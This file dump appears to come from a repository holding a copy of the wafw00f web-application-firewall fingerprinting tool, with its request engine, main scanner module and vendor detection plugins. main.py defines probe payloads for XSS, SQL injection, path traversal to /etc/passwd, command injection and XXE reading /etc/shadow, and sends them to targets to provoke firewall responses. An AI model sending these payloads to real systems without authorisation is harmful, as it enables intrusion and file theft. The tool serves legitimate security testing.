 98 |             if not headers:
 99 |                 h = self.headers
100 |             else:
101 |                 h = headers
102 |             req = requests.get(self.target, proxies=self.proxies, headers=h, timeout=timeout,
103 |                                allow_redirects=self.allowredir, params=params, verify=False)
104 |             self.log.info('Request Succeeded')
105 |             self.log.debug('Headers: %s\n' % req.headers)
106 |             self.log.debug('Content: %s\n' % req.content)
107 |             self.requestnumber += 1
108 |             return req
109 |         except requests.exceptions.RequestException as e:
110 |             pass
111 |             # print("WAF ERROR")
112 |             # self.log.error('Something went wrong %s' % (e.__str__()))
113 | 


--------------------------------------------------------------------------------
/wafw00f/main.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | '''
  4 | Copyright (C) 2020, WAFW00F Developers.
  5 | See the LICENSE file for copying permission.
  6 | '''
  7 | # For keeping python2 support for now
  8 | from __future__ import print_function
  9 | 
 10 | import io
 11 | import logging
 12 | import os
 13 | import random
 14 | import re
 15 | import sys
 16 | 
 17 | from wafw00f.lib.evillib import waftoolsengine, def_headers
 18 | from wafw00f.manager import load_plugins
 19 | from wafw00f.wafprio import wafdetectionsprio
 20 | 
 21 | 
 22 | class WAFW00F(waftoolsengine):
 23 |     xsstring = '<script>alert("XSS");</script>'
 24 |     sqlistring = "UNION SELECT ALL FROM information_schema AND ' or SLEEP(5) or '"
 25 |     lfistring = '../../../../etc/passwd'
 26 |     rcestring = '/bin/cat /etc/passwd; ping 127.0.0.1; curl google.com'
 27 |     xxestring = '<!ENTITY xxe SYSTEM "file:///etc/shadow">]><pwn>&hack;</pwn>'
 28 | 
 29 |     def __init__(self, target='www.example.com', debuglevel=0, path='/',
 30 |                  followredirect=True, extraheaders={}, proxies=None):
 31 | 
 32 |         self.log = logging.getLogger('wafw00f')
 33 |         self.attackres = None
 34 |         waftoolsengine.__init__(self, target, debuglevel, path, proxies, followredirect, extraheaders)
 35 |         self.knowledge = dict(generic=dict(found=False, reason=''), wafname=list())
 36 | 
 37 |     def normalRequest(self):
 38 |         return self.Request()
 39 | 
 40 |     def customRequest(self, headers=None):
 41 |         return self.Request(headers=headers)
 42 | 
 43 |     def nonExistent(self):
 44 |         return self.Request(path=self.path + str(random.randrange(100, 999)) + '.html')
 45 | 
 46 |     def xssAttack(self):
 47 |         return self.Request(path=self.path, params={'s': self.xsstring})
 48 | 
 49 |     def xxeAttack(self):
 50 |         return self.Request(path=self.path, params={'s': self.xxestring})
 51 | 
 52 |     def lfiAttack(self):
 53 |         return self.Request(path=self.path + self.lfistring)
 54 | 
 55 |     def centralAttack(self):
 56 |         return self.Request(path=self.path, params={'a': self.xsstring, 'b': self.sqlistring, 'c': self.lfistring})
 57 | 
 58 |     def sqliAttack(self):
 59 |         return self.Request(path=self.path, params={'s': self.sqlistring})
 60 | 
 61 |     def oscAttack(self):
 62 |         return self.Request(path=self.path, params={'s': self.rcestring})
 63 | 
 64 |     def performCheck(self, request_method):
 65 |         r = request_method()
 66 |         if r is None:
 67 |             raise RequestBlocked()
 68 |         return r
 69 | 
 70 |     # Most common attacks used to detect WAFs
 71 |     attcom = [xssAttack, sqliAttack, lfiAttack]
 72 |     attacks = [xssAttack, xxeAttack, lfiAttack, sqliAttack, oscAttack]
 73 | 
 74 |     def genericdetect(self):
 75 |         reason = ''
 76 |         reasons = ['Blocking is being done at connection/packet level.',
 77 |                    'The server header is different when an attack is detected.',
 78 |                    'The server returns a different response code when an attack string is used.',
 79 |                    'It closed the connection for a normal request.',
 80 |                    'The response was different when the request wasn\'t made from a browser.'
 81 |                    ]
 82 |         try:
 83 |             # Testing for no user-agent response. Detects almost all WAFs out there.
 84 |             resp1 = self.performCheck(self.normalRequest)
 85 |             if 'User-Agent' in self.headers:
 86 |                 del self.headers['User-Agent']  # Deleting the user-agent key from object not dict.
 87 |             resp3 = self.customRequest(headers=def_headers)
 88 |             if resp1.status_code != resp3.status_code:
 89 |                 self.log.info(
 90 |                     'Server returned a different response when request didn\'t contain the User-Agent header.')
 91 |                 reason = reasons[4]
 92 |                 reason += '\r\n'
 93 |                 reason += 'Normal response code is "%s",' % resp1.status_code
 94 |                 reason += ' while the response code to a modified request is "%s"' % resp3.status_code
 95 |                 self.knowledge['generic']['reason'] = reason
 96 |                 self.knowledge['generic']['found'] = True
 97 |                 return True
 98 | 
 99 |             # Testing the status code upon sending a xss attack
100 |             resp2 = self.performCheck(self.xssAttack)
101 |             if resp1.status_code != resp2.status_code:
102 |                 self.log.info('Server returned a different response when a XSS attack vector was tried.')
103 |                 reason = reasons[2]
104 |                 reason += '\r\n'
105 |                 reason += 'Normal response code is "%s",' % resp1.status_code
106 |                 reason += ' while the response code to cross-site scripting attack is "%s"' % resp2.status_code
107 |                 self.knowledge['generic']['reason'] = reason
108 |                 self.knowledge['generic']['found'] = True
109 |                 return True
110 | 
111 |             # Testing the status code upon sending a lfi attack
112 |             resp2 = self.performCheck(self.lfiAttack)
113 |             if resp1.status_code != resp2.status_code:
114 |                 self.log.info('Server returned a different response when a directory traversal was attempted.')
115 |                 reason = reasons[2]
116 |                 reason += '\r\n'
117 |                 reason += 'Normal response code is "%s",' % resp1.status_code
118 |                 reason += ' while the response code to a file inclusion attack is "%s"' % resp2.status_code
119 |                 self.knowledge['generic']['reason'] = reason
120 |                 self.knowledge['generic']['found'] = True
121 |                 return True
122 | 
123 |             # Testing the status code upon sending a sqli attack
124 |             resp2 = self.performCheck(self.sqliAttack)
125 |             if resp1.status_code != resp2.status_code:
126 |                 self.log.info('Server returned a different response when a SQLi was attempted.')
127 |                 reason = reasons[2]
128 |                 reason += '\r\n'
129 |                 reason += 'Normal response code is "%s",' % resp1.status_code
130 |                 reason += ' while the response code to a SQL injection attack is "%s"' % resp2.status_code
131 |                 self.knowledge['generic']['reason'] = reason
132 |                 self.knowledge['generic']['found'] = True
133 |                 return True
134 | 
135 |             # Checking for the Server header after sending malicious requests
136 |             response = self.attackres
137 |             normalserver = resp1.headers.get('Server')
138 |             attackresponse_server = response.headers.get('Server')
139 |             if attackresponse_server:
140 |                 if attackresponse_server != normalserver:
141 |                     self.log.info('Server header changed, WAF possibly detected')
142 |                     self.log.debug('Attack response: %s' % attackresponse_server)
143 |                     self.log.debug('Normal response: %s' % normalserver)
144 |                     reason = reasons[1]
145 |                     reason += '\r\nThe server header for a normal response is "%s",' % normalserver
146 |                     reason += ' while the server header a response to an attack is "%s",' % attackresponse_server
147 |                     self.knowledge['generic']['reason'] = reason
148 |                     self.knowledge['generic']['found'] = True
149 |                     return True
150 | 
151 |         # If at all request doesn't go, press F
152 |         except RequestBlocked:
153 |             self.knowledge['generic']['reason'] = reasons[0]
154 |             self.knowledge['generic']['found'] = True
155 |             return True
156 |         return False
157 | 
158 |     def matchHeader(self, headermatch, attack=False):
159 |         if attack:
160 |             r = self.attackres
161 |         else:
162 |             r = rq
163 |         if r is None:
164 |             return
165 |         header, match = headermatch
166 |         headerval = r.headers.get(header)
167 |         if headerval:
168 |             # set-cookie can have multiple headers, python gives it to us
169 |             # concatinated with a comma
170 |             if header == 'Set-Cookie':
171 |                 headervals = headerval.split(', ')
172 |             else:
173 |                 headervals = [headerval]
174 |             for headerval in headervals:
175 |                 if re.search(match, headerval, re.I):
176 |                     return True
177 |         return False
178 | 
179 |     def matchStatus(self, statuscode, attack=True):
180 |         if attack:
181 |             r = self.attackres
182 |         else:
183 |             r = rq
184 |         if r is None:
185 |             return
186 |         if r.status_code == statuscode:
187 |             return True
188 |         return False
189 | 
190 |     def matchCookie(self, match, attack=False):
191 |         return self.matchHeader(('Set-Cookie', match), attack=attack)
192 | 
193 |     def matchReason(self, reasoncode, attack=True):
194 |         if attack:
195 |             r = self.attackres
196 |         else:
197 |             r = rq
198 |         if r is None:
199 |             return
200 |         # We may need to match multiline context in response body
201 |         if str(r.reason) == reasoncode:
202 |             return True
203 |         return False
204 | 
205 |     def matchContent(self, regex, attack=True):
206 |         if attack:
207 |             r = self.attackres
208 |         else:
209 |             r = rq
210 |         if r is None:
211 |             return
212 |         # We may need to match multiline context in response body
213 |         if re.search(regex, r.text, re.I):
214 |             return True
215 |         return False
216 | 
217 |     wafdetections = dict()
218 | 
219 |     plugin_dict = load_plugins()
220 |     result_dict = {}
221 |     for plugin_module in plugin_dict.values():
222 |         wafdetections[plugin_module.NAME] = plugin_module.is_waf
223 |     # Check for prioritized ones first, then check those added externally
224 |     checklist = wafdetectionsprio
225 |     checklist += list(set(wafdetections.keys()) - set(checklist))
226 | 
227 |     def identwaf(self, findall=False):
228 |         detected = list()
229 |         try:
230 |             self.attackres = self.performCheck(self.centralAttack)
231 |         except RequestBlocked:
232 |             return detected
233 |         for wafvendor in self.checklist:
234 |             self.log.info('Checking for %s' % wafvendor)
235 |             if self.wafdetections[wafvendor](self):
236 |                 detected.append(wafvendor)
237 |                 if not findall:
238 |                     break
239 |         self.knowledge['wafname'] = detected
240 |         return detected
241 | 
242 | 
243 | def calclogginglevel(verbosity):
244 |     default = 40  # errors are printed out
245 |     level = default - (verbosity * 10)
246 |     if level < 0:
247 |         level = 0
248 |     return level
249 | 
250 | 
251 | def buildResultRecord(url, waf):
252 |     result = {}
253 |     result['url'] = url
254 |     if waf:
255 |         result['detected'] = True
256 |         if waf == 'generic':
257 |             result['firewall'] = 'Generic'
258 |             result['manufacturer'] = 'Unknown'
259 |         else:
260 |             result['firewall'] = waf.split('(')[0].strip()
261 |             result['manufacturer'] = waf.split('(')[1].replace(')', '').strip()
262 |     else:
263 |         result['detected'] = False
264 |         result['firewall'] = 'None'
265 |         result['manufacturer'] = 'None'
266 |     return result
267 | 
268 | 
269 | def getTextResults(res=None):
270 |     # leaving out some space for future possibilities of newer columns
271 |     # newer columns can be added to this tuple below
272 |     keys = ('detected')
273 |     res = [({key: ba[key] for key in ba if key not in keys}) for ba in res]
274 |     rows = []
275 |     for dk in res:
276 |         p = [str(x) for _, x in dk.items()]
277 |         rows.append(p)
278 |     for m in rows:
279 |         m[1] = '%s (%s)' % (m[1], m[2])
280 |         m.pop()
281 |     defgen = [
282 |         (max([len(str(row[i])) for row in rows]) + 3)
283 |         for i in range(len(rows[0]))
284 |     ]
285 |     rwfmt = "".join(["{:>" + str(dank) + "}" for dank in defgen])
286 |     textresults = []
287 |     for row in rows:
288 |         textresults.append(rwfmt.format(*row))
289 |     return textresults
290 | 
291 | 
292 | def disableStdOut():
293 |     sys.stdout = None
294 | 
295 | 
296 | def enableStdOut():
297 |     sys.stdout = sys.__stdout__
298 | 
299 | 
300 | def getheaders(fn):
301 |     headers = {}
302 |     if not os.path.exists(fn):
303 |         logging.getLogger('wafw00f').critical('Headers file "%s" does not exist!' % fn)
304 |         return
305 |     with io.open(fn, 'r', encoding='utf-8') as f:
306 |         for line in f.readlines():
307 |             _t = line.split(':', 2)
308 |             if len(_t) == 2:
309 |                 h, v = map(lambda x: x.strip(), _t)
310 |                 headers[h] = v
311 |     return headers
312 | 
313 | 
314 | class RequestBlocked(Exception):
315 |     pass
316 | 
317 | 
318 | def main(target):
319 |     attacker = WAFW00F(target)
320 |     global rq
321 |     try:
322 |         rq = attacker.normalRequest()
323 |     except Exception as e:
324 |         # print(f'waf检测：[{target}]访问出错{e}')
325 |         return False, None
326 |     if rq is None:
327 |         print(f'waf检测：[{target}]无法访问')
328 |         return False, None
329 |     try:
330 |         waf = attacker.identwaf(True)
331 |     except Exception as e:
332 |         print(f'waf检测：[{target}]检测出错{e}')
333 |         return False, None
334 |     if len(waf) > 0:
335 |         print(f'waf检测：[{target}]存在waf [{waf[0]}]')
336 |         return True, waf[0]
337 |     else:
338 |         return False, None
339 |     # parser = OptionParser(usage='%prog url1 [url2 [url3 ... ]]\r\nexample: %prog http://www.victim.org/')
340 |     # parser.add_option('-v', '--verbose', action='count', dest='verbose', default=0,
341 |     #                   help='Enable verbosity, multiple -v options increase verbosity')
342 |     # parser.add_option('-a', '--findall', action='store_true', dest='findall', default=False,
343 |     #                   help='Find all WAFs which match the signatures, do not stop testing on the first one')
344 |     # parser.add_option('-r', '--noredirect', action='store_false', dest='followredirect',
345 |     #                   default=True, help='Do not follow redirections given by 3xx responses')
346 |     # parser.add_option('-t', '--test', dest='test', help='Test for one specific WAF')
347 |     # parser.add_option('-o', '--output', dest='output', help='Write output to csv, json or text file depending on file extension. For stdout, specify - as filename.',
348 |     #                   default=None)
349 |     # parser.add_option('-i', '--input-file', dest='input', help='Read targets from a file. Input format can be csv, json or text. For csv and json, a `url` column name or element is required.',
350 |     #                   default=None)
351 |     # parser.add_option('-l', '--list', dest='list', action='store_true',
352 |     #                   default=False, help='List all WAFs that WAFW00F is able to detect')
353 |     # parser.add_option('-p', '--proxy', dest='proxy', default=None,
354 |     #                   help='Use an HTTP proxy to perform requests, examples: http://hostname:8080, socks5://hostname:1080, http://user:pass@hostname:8080')
355 |     # parser.add_option('--version', '-V', dest='version', action='store_true',
356 |     #                   default=False, help='Print out the current version of WafW00f and exit.')
357 |     # parser.add_option('--headers', '-H', dest='headers', action='store', default=None,
358 |     #                   help='Pass custom headers via a text file to overwrite the default header set.')
359 |     # options, args = parser.parse_args()
360 |     # logging.basicConfig(level=calclogginglevel(options.verbose))
361 |     # log = logging.getLogger('wafw00f')
362 |     # if options.output == '-':
363 |     #     disableStdOut()
364 |     # print(randomArt())
365 |     # if options.list:
366 |     #     print('[+] Can test for these WAFs:\r\n')
367 |     #     attacker = WAFW00F(None)
368 |     #     try:
369 |     #         m = [i.replace(')', '').split(' (') for i in wafdetectionsprio]
370 |     #         print(R+'  WAF Name'+' '*24+'Manufacturer\n  '+'-'*8+' '*24+'-'*12+'\n')
371 |     #         max_len = max(len(str(x)) for k in m for x in k)
372 |     #         for inner in m:
373 |     #             first = True
374 |     #             for elem in inner:
375 |     #                 if first:
376 |     #                     text = Y+"  {:<{}} ".format(elem, max_len+2)
377 |     #                     first = False
378 |     #                 else:
379 |     #                     text = W+"{:<{}} ".format(elem, max_len+2)
380 |     #                 print(text, E, end="")
381 |     #             print()
382 |     #         sys.exit(0)
383 |     #     except Exception:
384 |     #         return
385 |     # if options.version:
386 |     #     print('[+] The version of WAFW00F you have is %sv%s%s' % (B, __version__, E))
387 |     #     print('[+] WAFW00F is provided under the %s%s%s license.' % (C, __license__, E))
388 |     #     return
389 |     # extraheaders = {}
390 |     # if options.headers:
391 |     #     log.info('Getting extra headers from %s' % options.headers)
392 |     #     extraheaders = getheaders(options.headers)
393 |     #     if extraheaders is None:
394 |     #         parser.error('Please provide a headers file with colon delimited header names and values')
395 |     # if len(args) == 0 and not options.input:
396 |     #     parser.error('No test target specified.')
397 |     # #check if input file is present
398 |     # if options.input:
399 |     #     log.debug("Loading file '%s'" % options.input)
400 |     #     try:
401 |     #         if options.input.endswith('.json'):
402 |     #             with open(options.input) as f:
403 |     #                 try:
404 |     #                     urls = json.loads(f.read())
405 |     #                 except json.decoder.JSONDecodeError:
406 |     #                     log.critical("JSON file %s did not contain well-formed JSON", options.input)
407 |     #                     sys.exit(1)
408 |     #             log.info("Found: %s urls to check." %(len(urls)))
409 |     #             targets = [ item['url'] for item in urls ]
410 |     #         elif options.input.endswith('.csv'):
411 |     #             columns = defaultdict(list)
412 |     #             with open(options.input) as f:
413 |     #                 reader = csv.DictReader(f)
414 |     #                 for row in reader:
415 |     #                     for (k,v) in row.items():
416 |     #                         columns[k].append(v)
417 |     #             targets = columns['url']
418 |     #         else:
419 |     #             with open(options.input) as f:
420 |     #                 targets = [x for x in f.read().splitlines()]
421 |     #     except FileNotFoundError:
422 |     #         log.error('File %s could not be read. No targets loaded.', options.input)
423 |     #         sys.exit(1)
424 |     # else:
425 |     #     targets = args
426 |     # results = []
427 |     # for target in targets:
428 |     #     if not target.startswith('http'):
429 |     #         log.info('The url %s should start with http:// or https:// .. fixing (might make this unusable)' % target)
430 |     #         target = 'https://' + target
431 |     #     print('[*] Checking %s' % target)
432 |     #     pret = urlParser(target)
433 |     #     if pret is None:
434 |     #         log.critical('The url %s is not well formed' % target)
435 |     #         sys.exit(1)
436 |     #     (hostname, _, path, _, _) = pret
437 |     #     log.info('starting wafw00f on %s' % target)
438 |     #     proxies = dict()
439 |     #     if options.proxy:
440 |     #         proxies = {
441 |     #             "http": options.proxy,
442 |     #             "https": options.proxy,
443 |     #         }
444 |     #     attacker = WAFW00F(target, debuglevel=options.verbose, path=path,
445 |     #                 followredirect=options.followredirect, extraheaders=extraheaders,
446 |     #                     proxies=proxies)
447 |     #     global rq
448 |     #     rq = attacker.normalRequest()
449 |     #     if rq is None:
450 |     #         log.error('Site %s appears to be down' % hostname)
451 |     #         continue
452 |     #     if options.test:
453 |     #         if options.test in attacker.wafdetections:
454 |     #             waf = attacker.wafdetections[options.test](attacker)
455 |     #             if waf:
456 |     #                 print('[+] The site %s%s%s is behind %s%s%s WAF.' % (B, target, E, C, options.test, E))
457 |     #             else:
458 |     #                 print('[-] WAF %s was not detected on %s' % (options.test, target))
459 |     #         else:
460 |     #             print('[-] WAF %s was not found in our list\r\nUse the --list option to see what is available' % options.test)
461 |     #         return
462 |     #     waf = attacker.identwaf(options.findall)
463 |     #     log.info('Identified WAF: %s' % waf)
464 |     #     if len(waf) > 0:
465 |     #         for i in waf:
466 |     #             results.append(buildResultRecord(target, i))
467 |     #         print('[+] The site %s%s%s is behind %s%s%s WAF.' % (B, target, E, C, (E+' and/or '+C).join(waf), E))
468 |     #     if (options.findall) or len(waf) == 0:
469 |     #         print('[+] Generic Detection results:')
470 |     #         if attacker.genericdetect():
471 |     #             log.info('Generic Detection: %s' % attacker.knowledge['generic']['reason'])
472 |     #             print('[*] The site %s seems to be behind a WAF or some sort of security solution' % target)
473 |     #             print('[~] Reason: %s' % attacker.knowledge['generic']['reason'])
474 |     #             results.append(buildResultRecord(target, 'generic'))
475 |     #         else:
476 |     #             print('[-] No WAF detected by the generic detection')
477 |     #             results.append(buildResultRecord(target, None))
478 |     #     print('[~] Number of requests: %s' % attacker.requestnumber)
479 |     # #print table of results
480 |     # if len(results) > 0:
481 |     #     log.info("Found: %s matches." % (len(results)))
482 |     # if options.output:
483 |     #     if options.output == '-':
484 |     #         enableStdOut()
485 |     #         print(os.linesep.join(getTextResults(results)))
486 |     #     elif options.output.endswith('.json'):
487 |     #         log.debug("Exporting data in json format to file: %s" % (options.output))
488 |     #         with open(options.output, 'w') as outfile:
489 |     #             json.dump(results, outfile, indent=2)
490 |     #     elif options.output.endswith('.csv'):
491 |     #         log.debug("Exporting data in csv format to file: %s" % (options.output))
492 |     #         with open(options.output, 'w') as outfile:
493 |     #             csvwriter = csv.writer(outfile, delimiter=',', quotechar='"',
494 |     #                 quoting=csv.QUOTE_MINIMAL)
495 |     #             count = 0
496 |     #             for result in results:
497 |     #                 if count == 0:
498 |     #                     header = result.keys()
499 |     #                     csvwriter.writerow(header)
500 |     #                     count += 1
501 |     #                 csvwriter.writerow(result.values())
502 |     #     else:
503 |     #         log.debug("Exporting data in text format to file: %s" % (options.output))
504 |     #         with open(options.output, 'w') as outfile:
505 |     #             outfile.write(os.linesep.join(getTextResults(results)))
506 | 
507 | 
508 | if __name__ == '__main__':
509 |     if sys.hexversion < 0x2060000:
510 |         sys.stderr.write('Your version of python is way too old... please update to 2.6 or later\r\n')
511 |     main()
512 | 


--------------------------------------------------------------------------------
/wafw00f/manager.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | import os
 8 | from functools import partial
 9 | 
10 | from pluginbase import PluginBase
11 | 
12 | 
13 | def load_plugins():
14 |     here = os.path.abspath(os.path.dirname(__file__))
15 |     get_path = partial(os.path.join, here)
16 |     plugin_dir = get_path('plugins')
17 | 
18 |     plugin_base = PluginBase(
19 |         package='wafw00f.plugins', searchpath=[plugin_dir]
20 |     )
21 |     plugin_source = plugin_base.make_plugin_source(
22 |         searchpath=[plugin_dir], persist=True
23 |     )
24 | 
25 |     plugin_dict = {}
26 |     for plugin_name in plugin_source.list_plugins():
27 |         plugin_dict[plugin_name] = plugin_source.load_plugin(plugin_name)
28 | 
29 |     return plugin_dict
30 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wgpsec/urlscan/c1391f849047b05616e10c15718772c3c09d0a2f/wafw00f/plugins/__init__.py


--------------------------------------------------------------------------------
/wafw00f/plugins/aesecure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'aeSecure (aeSecure)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('aeSecure-code', '.+?')),
13 |         self.matchContent(r'aesecure_denied\.png')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/airee.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AireeCDN (Airee)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Airee')),
13 |         self.matchHeader(('X-Cache', r'(\w+\.)?airee\.cloud')),
14 |         self.matchContent(r'airee\.cloud')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/airlock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Airlock (Phion/Ergon)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # This method of detection is old (though most reliable), so we check it first
13 |         self.matchCookie(r'^al[_-]?(sess|lb)='),
14 |         self.matchContent(r'server detected a syntax error in your request')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/alertlogic.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Alert Logic (Alert Logic)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<(title|h\d{1})>requested url cannot be found'),
13 |         self.matchContent(r'we are sorry.{0,10}?but the page you are looking for cannot be found'),
14 |         self.matchContent(r'back to previous page'),
15 |         self.matchContent(r'proceed to homepage'),
16 |         self.matchContent(r'reference id'),
17 |     ]
18 |     if all(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/aliyundun.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AliYunDun (Alibaba Cloud Computing)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'error(s)?\.aliyun(dun)?\.(com|net)?'),
13 |         self.matchCookie(r'^aliyungf_tc='),
14 |         self.matchContent(r'cdn\.aliyun(cs)?\.com'),
15 |         self.matchStatus(405)
16 |     ]
17 |     if all(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/anquanbao.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Anquanbao (Anquanbao)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Powered-By-Anquanbao', '.+?')),
13 |         self.matchContent(r'aqb_cc/error/')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/anyu.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AnYu (AnYu Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'anyu.{0,10}?the green channel'),
13 |         self.matchContent(r'your access has been intercepted by anyu')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/approach.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Approach (Approach)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # This method of detection is old (though most reliable), so we check it first
13 |         self.matchContent(r'approach.{0,10}?web application (firewall|filtering)'),
14 |         self.matchContent(r'approach.{0,10}?infrastructure team')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/armor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Armor Defense (Armor)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'blocked by website protection from armor'),
13 |         self.matchContent(r'please create an armor support ticket')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/arvancloud.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ArvanCloud (ArvanCloud)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'ArvanCloud'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/aspa.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ASPA Firewall (ASPA Engineering Co.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'ASPA[\-_]?WAF')),
13 |         self.matchHeader(('ASPA-Cache-Status', r'.+?'))
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/aspnetgen.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ASP.NET Generic (Microsoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'iis (\d+.)+?detailed error'),
13 |         self.matchContent(r'potentially dangerous request querystring'),
14 |         self.matchContent(r'application error from being viewed remotely (for security reasons)?'),
15 |         self.matchContent(r'An application error occurred on the server'),
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/astra.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Astra (Czar Securities)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^cz_astra_csrf_cookie'),
13 |         self.matchContent(r'astrawebsecurity\.freshdesk\.com'),
14 |         self.matchContent(r'www\.getastra\.com/assets/images')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/awswaf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AWS Elastic Load Balancer (Amazon)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-AMZ-ID', '.+?')),
13 |         self.matchHeader(('X-AMZ-Request-ID', '.+?')),
14 |         self.matchCookie(r'^aws.?alb='),
15 |         self.matchHeader(('Server', r'aws.?elb'), attack=True)
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/azion.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AzionCDN (AzionCDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'Azion([-_]CDN)?'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/baidu.py:
